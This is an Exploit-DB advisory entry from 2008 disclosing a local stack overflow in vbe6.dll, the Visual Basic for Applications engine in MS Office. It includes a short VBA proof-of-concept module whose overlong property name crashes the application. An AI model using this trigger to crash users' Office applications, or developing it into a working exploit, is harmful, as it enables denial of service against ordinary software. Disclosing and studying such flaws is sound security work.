Visual Basic vbe6.dll Local Stack Overflow PoC / DoS

ID EDB-ID:5321
Type exploitdb
Reporter Marsu
Modified 2008-03-30T00:00:00


Visual Basic (vbe6.dll) Local Stack Overflow PoC / DoS. Dos exploit for windows platform

                                            Stack overflow in vbe6.dll, (used by all versions of MS Office)
The overflow occurs in Visual Basic for Application. 
Creating a property with a long name ( about 247 chars) results in a stack overflow in vbe6.dll which overwrites with a null byte the first byte of the return address.

Probably impossible to exploit, but who knows? ^^ At least, there still exist stack overflows in Office apps :P

Marsu <>


Attribute VB_Name = "Module1"

Public Property Get aaabcdefghissssssaaaaaaaaaaaaaaaaaaaaaaaaaadaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaabdaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaadaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaadaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaasssssssssssssssssssssssssssssssssssssssssssssssssssade() As Variant
End Property

# [2008-03-30]